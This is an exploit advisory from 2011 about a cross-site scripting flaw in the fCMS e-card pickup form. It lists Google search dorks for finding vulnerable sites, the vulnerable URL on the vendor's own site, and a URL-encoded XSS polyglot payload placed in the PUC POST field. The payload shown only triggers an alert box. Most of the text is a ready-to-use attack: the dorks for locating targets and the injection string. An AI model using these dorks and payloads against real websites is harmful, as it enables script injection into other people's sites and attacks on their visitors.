fCMS Cross Site Scripting [elektronische Grußkarte]

# Exploit Title: fCMS Cross Site Scripting
# Google Dorks: "inurl:/_/ecards.html?_","inurl:_/ecards.html?PUC=","inurl:_/ecards.html?_PICKID="
# Date: 24.08.2011
# Author: Sony
# Software Link: http://www.fidion.de/
# Version: all version
# Proof of concept: http://st2tea.blogspot.com/2011/08/fcms-cross-site-scripting.html

..................................................................
Elektronische Grußkarte

Method Post:

http://www.fidion.de/_/ecards.html?_FRAME=33&_PICKID=

Put our code in the Pickup-Code and press button Pickup

POST /_/ecards.html?_FRAME=33&_PICKID= PUC=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E


Our code:

http://codepad.org/mMQfVBcw

pics: